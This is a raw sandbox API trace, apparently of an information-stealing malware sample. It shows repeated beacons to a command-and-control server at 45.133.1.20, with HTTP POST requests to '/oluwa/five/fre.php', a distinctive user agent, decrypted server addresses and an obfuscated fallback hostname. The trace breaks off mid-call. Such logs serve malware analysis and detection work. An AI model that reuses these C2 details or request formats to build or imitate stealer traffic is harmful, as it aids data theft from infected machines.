0 [0309.264] GetProcessHeap () returned 0x6a0000 [0309.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa00 [0309.265] socket (af=2, type=1, protocol=6) returned 0xbbc [0309.265] connect (s=0xbbc, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0309.301] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0309.301] GetProcessHeap () returned 0x6a0000 [0309.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0309.301] GetProcessHeap () returned 0x6a0000 [0309.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0309.302] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0309.303] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.303] GetProcessHeap () returned 0x6a0000 [0309.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df7a8 [0309.303] GetProcessHeap () returned 0x6a0000 [0309.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0309.304] GetProcessHeap () returned 0x6a0000 [0309.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0309.304] GetProcessHeap () returned 0x6a0000 [0309.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0309.305] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0309.306] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.306] GetProcessHeap () returned 0x6a0000 [0309.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0309.306] GetProcessHeap () returned 0x6a0000 [0309.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0309.307] send (s=0xbbc, buf=0x6bd460*, len=242, flags=0) returned 242 [0309.308] send (s=0xbbc, buf=0x6bb998*, len=159, flags=0) returned 159 [0309.308] GetProcessHeap () returned 0x6a0000 [0309.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0309.308] recv (in: s=0xbbc, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0309.382] GetProcessHeap () returned 0x6a0000 [0309.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0309.382] GetProcessHeap () returned 0x6a0000 [0309.382] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0309.383] GetProcessHeap () returned 0x6a0000 [0309.383] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df7a8 | out: hHeap=0x6a0000) returned 1 [0309.383] GetProcessHeap () returned 0x6a0000 [0309.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0309.384] closesocket (s=0xbbc) returned 0 [0309.384] GetProcessHeap () returned 0x6a0000 [0309.384] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa00 | out: hHeap=0x6a0000) returned 1 [0309.384] GetProcessHeap () returned 0x6a0000 [0309.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.385] GetProcessHeap () returned 0x6a0000 [0309.385] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0309.385] GetProcessHeap () returned 0x6a0000 [0309.386] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0309.386] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18fc) returned 0xbbc [0309.388] Sleep (dwMilliseconds=0xea60) [0309.389] GetProcessHeap () returned 0x6a0000 [0309.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0309.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.390] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.395] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.396] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0309.404] GetProcessHeap () returned 0x6a0000 [0309.404] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6668 [0309.405] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.405] CryptImportKey (in: hProv=0x6bf278, pbData=0x6b6668, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0309.406] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.406] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.408] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.408] GetProcessHeap () returned 0x6a0000 [0309.408] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6668 | out: hHeap=0x6a0000) returned 1 [0309.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.410] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0309.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.413] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0309.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.414] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0309.414] GetProcessHeap () returned 0x6a0000 [0309.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.414] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.416] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.417] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.418] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.418] GetProcessHeap () returned 0x6a0000 [0309.418] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0309.418] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.419] GetProcessHeap () returned 0x6a0000 [0309.419] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0309.422] GetProcessHeap () returned 0x6a0000 [0309.422] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.423] GetProcessHeap () returned 0x6a0000 [0309.423] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0309.423] GetProcessHeap () returned 0x6a0000 [0309.423] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0309.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0309.442] GetProcessHeap () returned 0x6a0000 [0309.442] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0309.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.443] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0309.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.449] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.451] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.451] GetProcessHeap () returned 0x6a0000 [0309.452] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0309.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.454] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0309.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.455] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0309.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.458] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0309.458] GetProcessHeap () returned 0x6a0000 [0309.459] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.459] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0309.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.460] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0309.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.461] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0309.462] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.462] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0309.462] GetProcessHeap () returned 0x6a0000 [0309.462] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0309.462] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0309.462] GetProcessHeap () returned 0x6a0000 [0309.463] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baac0 [0309.463] socket (af=2, type=1, protocol=6) returned 0xbc0 [0309.463] connect (s=0xbc0, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0309.503] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0309.503] GetProcessHeap () returned 0x6a0000 [0309.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0309.503] GetProcessHeap () returned 0x6a0000 [0309.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0309.504] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0309.505] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.505] GetProcessHeap () returned 0x6a0000 [0309.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df568 [0309.505] GetProcessHeap () returned 0x6a0000 [0309.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0309.505] GetProcessHeap () returned 0x6a0000 [0309.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0309.505] GetProcessHeap () returned 0x6a0000 [0309.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0309.506] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0309.507] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.507] GetProcessHeap () returned 0x6a0000 [0309.507] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0309.507] GetProcessHeap () returned 0x6a0000 [0309.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0309.508] send (s=0xbc0, buf=0x6bd460*, len=242, flags=0) returned 242 [0309.508] send (s=0xbc0, buf=0x6bb998*, len=159, flags=0) returned 159 [0309.508] GetProcessHeap () returned 0x6a0000 [0309.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0309.509] recv (in: s=0xbc0, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0309.584] GetProcessHeap () returned 0x6a0000 [0309.584] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0309.585] GetProcessHeap () returned 0x6a0000 [0309.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0309.585] GetProcessHeap () returned 0x6a0000 [0309.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df568 | out: hHeap=0x6a0000) returned 1 [0309.585] GetProcessHeap () returned 0x6a0000 [0309.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0309.586] closesocket (s=0xbc0) returned 0 [0309.586] GetProcessHeap () returned 0x6a0000 [0309.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baac0 | out: hHeap=0x6a0000) returned 1 [0309.586] GetProcessHeap () returned 0x6a0000 [0309.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.587] GetProcessHeap () returned 0x6a0000 [0309.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0309.587] GetProcessHeap () returned 0x6a0000 [0309.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0309.588] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1900) returned 0xbc0 [0309.590] Sleep (dwMilliseconds=0xea60) [0309.596] GetProcessHeap () returned 0x6a0000 [0309.596] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0309.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.598] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.610] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0309.625] GetProcessHeap () returned 0x6a0000 [0309.625] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0309.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.629] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0309.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.630] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.631] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.632] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.632] GetProcessHeap () returned 0x6a0000 [0309.632] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0309.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.634] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0309.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.635] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0309.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.638] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0309.638] GetProcessHeap () returned 0x6a0000 [0309.638] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.639] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.640] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.642] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.643] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.644] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.644] GetProcessHeap () returned 0x6a0000 [0309.645] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0309.645] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.645] GetProcessHeap () returned 0x6a0000 [0309.645] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0309.646] GetProcessHeap () returned 0x6a0000 [0309.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.646] GetProcessHeap () returned 0x6a0000 [0309.646] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0309.646] GetProcessHeap () returned 0x6a0000 [0309.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0309.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.648] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.659] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0309.683] GetProcessHeap () returned 0x6a0000 [0309.683] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0309.686] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.813] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0309.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.815] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.854] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.854] GetProcessHeap () returned 0x6a0000 [0309.855] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0309.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.856] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0309.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.858] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0309.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.859] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0309.859] GetProcessHeap () returned 0x6a0000 [0309.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.863] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0309.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.864] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0309.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.866] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0309.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.867] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0309.867] GetProcessHeap () returned 0x6a0000 [0309.867] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0309.867] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0309.868] GetProcessHeap () returned 0x6a0000 [0309.868] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa60 [0309.868] socket (af=2, type=1, protocol=6) returned 0xbc4 [0309.868] connect (s=0xbc4, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0309.896] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0309.896] GetProcessHeap () returned 0x6a0000 [0309.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0309.896] GetProcessHeap () returned 0x6a0000 [0309.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0309.897] LoadLibraryW 